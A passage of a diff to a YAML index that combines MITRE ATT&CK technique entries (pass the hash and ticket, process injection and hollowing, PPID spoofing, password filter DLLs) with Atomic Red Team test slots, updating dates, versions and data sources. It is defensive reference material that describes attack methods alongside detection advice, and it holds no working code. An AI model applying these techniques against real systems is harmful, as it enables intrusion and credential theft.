assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017) id: attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a @@ -36339,7 +28817,7 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-04-16T19:37:02.030Z' + modified: '2021-02-09T14:11:20.296Z' created: '2020-02-18T18:22:41.448Z' x_mitre_contributors: - Wayne Silva, F-Secure Countercept @@ -36356,9 +28834,9 @@ defense-evasion: Monitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible. x_mitre_data_sources: - - API monitoring - - Process monitoring - - Windows event logs + - 'Process: OS API Execution' + - 'Process: Process Creation' + - 'Process: Process Metadata' x_mitre_platforms: - Windows identifier: T1134.004 @@ -36551,19 +29029,20 @@ defense-evasion: - external_id: CAPEC-644 source_name: capec url: https://capec.mitre.org/data/definitions/644.html - - source_name: NSA Spotting - description: National Security Agency/Central Security Service Information - Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows - Event Log Monitoring. Retrieved September 6, 2018. - url: https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm + - source_name: Stealthbits Overpass-the-Hash + url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/ + description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash + Attacks. Retrieved February 4, 2021. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Pass the Hash description: |- - Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. + Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. - Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.(Citation: NSA Spotting) + When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. + + Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash) id: attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e type: attack-pattern kill_chain_phases: @@ -36571,20 +29050,22 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-23T16:24:34.766Z' + modified: '2021-03-15T21:04:33.228Z' created: '2020-01-30T16:36:51.184Z' x_mitre_defense_bypassed: - System Access Controls - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true - x_mitre_detection: Audit all logon and credential use events and review for - discrepancies. Unusual remote logins that correlate with other suspicious - activity (such as writing and executing binaries) may indicate malicious activity. - NTLM LogonType 3 authentications that are not associated to a domain login - and are not anonymous logins are suspicious. + x_mitre_detection: |- + Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious. + + Event ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash) x_mitre_data_sources: - - Authentication logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + - 'Active Directory: Active Directory Credential Request' x_mitre_contributors: + - Blake Strom, Microsoft 365 Defender - Travis Smith, Tripwire x_mitre_platforms: - Windows @@ -36702,6 +29183,10 @@ defense-evasion: description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014. source_name: Campbell 2014 + - source_name: Stealthbits Overpass-the-Hash + url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/ + description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash + Attacks. Retrieved February 4, 2021. - url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017. @@ -36713,11 +29198,13 @@ defense-evasion: description: |- Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system. - In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket) + When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket) - [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks) + A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks) - [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014) + A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014) + + Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash) id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926 type: attack-pattern kill_chain_phases: @@ -36725,11 +29212,11 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-12T17:03:16.122Z' + modified: '2021-03-15T21:42:11.839Z' created: '2020-01-30T17:03:43.072Z' x_mitre_defense_bypassed: - System Access Controls - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_system_requirements: - Kerberos authentication enabled @@ -36738,7 +29225,9 @@ defense-evasion: Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection) x_mitre_data_sources: - - Authentication logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + - 'Active Directory: Active Directory Credential Request' x_mitre_contributors: - Vincent Le Toux - Ryan Becwar @@ -36823,11 +29312,14 @@ defense-evasion: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-25T20:59:05.209Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:11:55.147Z' created: '2020-02-11T19:05:45.829Z' x_mitre_data_sources: - - File monitoring - - DLL monitoring + - 'File: File Creation' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_contributors: - Vincent Le Toux x_mitre_permissions_required: @@ -36837,7 +29329,7 @@ defense-evasion: Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference. Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013) - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_platforms: - Windows @@ -36984,9 +29476,7 @@ defense-evasion: Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) x_mitre_data_sources: - - Network device run-time memory - - Network device configuration - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network atomic_tests: [] @@ -37032,8 +29522,9 @@ defense-evasion: Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. x_mitre_data_sources: - - Process monitoring - - File monitoring + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_contributors: - Stefan Kanthak x_mitre_platforms: @@ -37091,8 +29582,9 @@ defense-evasion: x_mitre_contributors: - Stefan Kanthak x_mitre_data_sources: - - Process monitoring - - File monitoring + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_detection: | Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. @@ -37161,8 +29653,9 @@ defense-evasion: Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. x_mitre_data_sources: - - Process monitoring - - File monitoring + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_contributors: - Stefan Kanthak x_mitre_platforms: @@ -37240,9 +29733,11 @@ defense-evasion: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-07-13T21:23:01.370Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:12:34.422Z' created: '2020-06-26T04:01:09.648Z' - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: - root @@ -37251,8 +29746,8 @@ defense-evasion: Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). x_mitre_data_sources: - - Authentication logs - - File monitoring + - 'File: File Modification' + - 'Logon Session: Logon Session Creation' x_mitre_contributors: - Scott Knight, @sdotknight, VMware Carbon Black - George Allen, VMware Carbon Black @@ -37298,8 +29793,8 @@ defense-evasion: x_mitre_detection: Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows. x_mitre_data_sources: - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: - Linux - macOS @@ -37308,19 +29803,15 @@ defense-evasion: atomic_tests: [] T1055.002: technique: - external_references: - - source_name: mitre-attack - external_id: T1055.002 - url: https://attack.mitre.org/techniques/T1055/002 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Portable Executable Injection + created: '2020-01-14T01:27:31.344Z' + modified: '2020-11-10T18:29:30.882Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662 description: "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space @@ -37330,28 +29821,28 @@ defense-evasion: with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional - requirement for functionality to remap memory references. (Citation: Endgame + requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. " - id: attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:19:58.813Z' - created: '2020-01-14T01:27:31.344Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_permissions_required: - - User + name: Portable Executable Injection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1055.002 + url: https://attack.mitre.org/techniques/T1055/002 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances @@ -37359,14 +29850,18 @@ defense-evasion: common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze + may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_defense_bypassed: + - Anti-virus + - Application control atomic_tests: [] T1542: technique: @@ -37404,14 +29899,12 @@ defense-evasion: - Windows - Network x_mitre_data_sources: - - VBR - - MBR - - Component firmware - - Process monitoring - - Disk forensics - - EFI - - BIOS - - API monitoring + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + - 'Firmware: Firmware Modification' + - 'Driver: Driver Metadata' + - 'Process: OS API Execution' + - 'Drive: Drive Modification' x_mitre_permissions_required: - Administrator - SYSTEM @@ -37462,14 +29955,14 @@ defense-evasion: hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux - Injection)(Citation: DD Man) \n\nOther techniques such as [LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006) - may be used to populate a target process with more available gadgets. Similar - to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc - memory injection may target child processes (such as a backgrounded copy of - sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of - another process may allow access to the process's memory, system/network resources, - and possibly elevated privileges. Execution via proc memory injection may - also evade detection from security products since the execution is masked + Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker + Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate + a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), + proc memory injection may target child processes (such as a backgrounded copy + of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context + of another process may allow access to the process's memory, system/network + resources, and possibly elevated privileges. Execution via proc memory injection + may also evade detection from security products since the execution is masked under a legitimate process. " id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591 type: attack-pattern @@ -37484,8 +29977,7 @@ defense-evasion: - Application control - Anti-virus x_mitre_data_sources: - - Process monitoring - - File monitoring + - 'File: File Modification' x_mitre_detection: "File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. \n\nAnalyze process behavior to determine if a process is performing actions @@ -37545,7 +30037,7 @@ defense-evasion: the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). - Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), + Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored @@ -37570,15 +30062,14 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-06-20T22:27:21.304Z' + modified: '2021-02-09T15:43:48.848Z' created: '2020-01-14T17:19:50.978Z' x_mitre_defense_bypassed: - Anti-virus - Application control x_mitre_data_sources: - - File monitoring - - Process monitoring - - API monitoring + - 'Process: OS API Execution' + - 'File: File Metadata' x_mitre_permissions_required: - Administrator - SYSTEM @@ -37608,7 +30099,7 @@ defense-evasion: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -37625,7 +30116,7 @@ defense-evasion: \ before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: - Endgame Process Injection July 2017)\n\nThis is very similar to [Thread Local + Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from @@ -37639,14 +30130,14 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-06-20T22:28:08.758Z' + modified: '2020-11-10T18:29:31.031Z' created: '2020-01-14T17:21:54.470Z' x_mitre_defense_bypassed: - Application control - Anti-virus x_mitre_data_sources: - - Process monitoring - - API monitoring + - 'Process: OS API Execution' + - 'Process: Process Access' x_mitre_permissions_required: - User x_mitre_detection: "Monitoring Windows API calls indicative of the various types @@ -37657,7 +30148,7 @@ defense-evasion: such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for - this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze + this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " @@ -37737,21 +30228,16 @@ defense-evasion: name: powershell T1055: technique: - id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Process Injection - description: "Adversaries may inject code into processes in order to evade process-based - defenses as well as possibly elevate privileges. Process injection is a method - of executing arbitrary code in the address space of a separate live process. - Running code in the context of another process may allow access to the process's - memory, system/network resources, and possibly elevated privileges. Execution - via process injection may also evade detection from security products since - the execution is masked under a legitimate process. \n\nThere are many different - ways to inject code into a process, many of which abuse legitimate functionalities. - These implementations exist for every major OS but are typically platform - specific. \n\nMore sophisticated samples may perform multiple process injections - to segment modules and further evade detection, utilizing named pipes or other - inter-process communication (IPC) mechanisms as a communication channel. " + created: '2017-05-31T21:30:47.843Z' + modified: '2021-02-09T15:43:50.029Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1055 @@ -37763,7 +30249,7 @@ defense-evasion: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.' @@ -37784,20 +30270,36 @@ defense-evasion: description: Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017. source_name: Microsoft Sysmon v6 May 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:28:45.651Z' - created: '2017-05-31T21:30:47.843Z' - x_mitre_platforms: - - Linux - - macOS - - Windows + description: "Adversaries may inject code into processes in order to evade process-based + defenses as well as possibly elevate privileges. Process injection is a method + of executing arbitrary code in the address space of a separate live process. + Running code in the context of another process may allow access to the process's + memory, system/network resources, and possibly elevated privileges. Execution + via process injection may also evade detection from security products since + the execution is masked under a legitimate process. \n\nThere are many different + ways to inject code into a process, many of which abuse legitimate functionalities. + These implementations exist for every major OS but are typically platform + specific. \n\nMore sophisticated samples may perform multiple process injections + to segment modules and further evade detection, utilizing named pipes or other + inter-process communication (IPC) mechanisms as a communication channel. " + name: Process Injection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + x_mitre_contributors: + - Anastasios Pingios + - Christiaan Beek, @ChristiaanBeek + - Ryan Becwar + x_mitre_data_sources: + - 'Module: Module Load' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' + - 'File: File Metadata' + x_mitre_defense_bypassed: + - Application control + - Anti-virus x_mitre_detection: "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances @@ -37806,7 +30308,7 @@ defense-evasion: such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017) + may be used for this technique.(Citation: Elastic Process Injection July 2017) \n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nMonitoring for Linux @@ -37820,21 +30322,10 @@ defense-evasion: to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - API monitoring - - File monitoring - - DLL monitoring - - Process monitoring - - Named Pipes - x_mitre_contributors: - - Anastasios Pingios - - Christiaan Beek, @ChristiaanBeek - - Ryan Becwar - x_mitre_version: '1.1' - x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows identifier: T1055 atomic_tests: - name: Shellcode execution via VBA @@ -37996,8 +30487,8 @@ defense-evasion: - Anti-virus - Application control x_mitre_data_sources: - - System calls - - Process monitoring + - 'Process: OS API Execution' + - 'Process: Process Access' x_mitre_detection: "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection @@ -38044,8 +30535,9 @@ defense-evasion: parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Script: Script Execution' x_mitre_platforms: - Windows identifier: T1216.001 @@ -38111,10 +30603,7 @@ defense-evasion: x_mitre_permissions_required: - Administrator x_mitre_data_sources: - - File monitoring - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture + - 'Firmware: Firmware Modification' atomic_tests: [] T1600.001: technique: @@ -38148,7 +30637,7 @@ defense-evasion: modified: '2020-10-21T22:36:22.369Z' created: '2020-10-19T19:03:48.310Z' x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network x_mitre_detection: There is no documented method for defenders to directly identify @@ -38199,23 +30688,11 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence - modified: '2020-03-30T13:47:29.922Z' + modified: '2021-03-08T10:33:00.985Z' created: '2017-05-31T21:31:18.867Z' x_mitre_deprecated: true x_mitre_is_subtechnique: false - x_mitre_version: '3.0' - x_mitre_data_sources: - - Office 365 account logs - - Azure activity logs - - AWS CloudTrail logs - - Stackdriver logs - - Process monitoring - - Process use of network - - Packet capture - - Network protocol analysis - - File monitoring - - Authentication logs - - Binary file metadata + x_mitre_version: '3.1' x_mitre_defense_bypassed: - Network intrusion detection system - Anti-virus @@ -38228,15 +30705,13 @@ defense-evasion: For alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information. x_mitre_platforms: - - Linux - - macOS - Windows - - AWS - - GCP - - Azure + - Azure AD - Office 365 - SaaS - - Azure AD + - IaaS + - Linux + - macOS x_mitre_permissions_required: - User - Administrator @@ -38284,8 +30759,8 @@ defense-evasion: x_mitre_contributors: - Casey Smith x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries @@ -38426,10 +30901,10 @@ defense-evasion: x_mitre_contributors: - Casey Smith x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - - Loaded DLLs + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' x_mitre_detection: 'Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially @@ -38622,14 +31097,14 @@ defense-evasion: url: https://lolbas-project.github.io/ description: LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020. - - source_name: Endgame Masquerade Ball + - source_name: Elastic Masquerade Ball description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.' url: http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf - - url: https://www.f-secure.com/documents/996508/1030745/CozyDuke + - source_name: F-Secure CozyDuke description: 'F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.' - source_name: F-Secure CozyDuke + url: https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163418/CozyDuke.pdf - source_name: Twitter ItsReallyNick Masquerading Update url: https://twitter.com/ItsReallyNick/status/1055321652777619457 description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. @@ -38643,7 +31118,7 @@ defense-evasion: and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: - rename 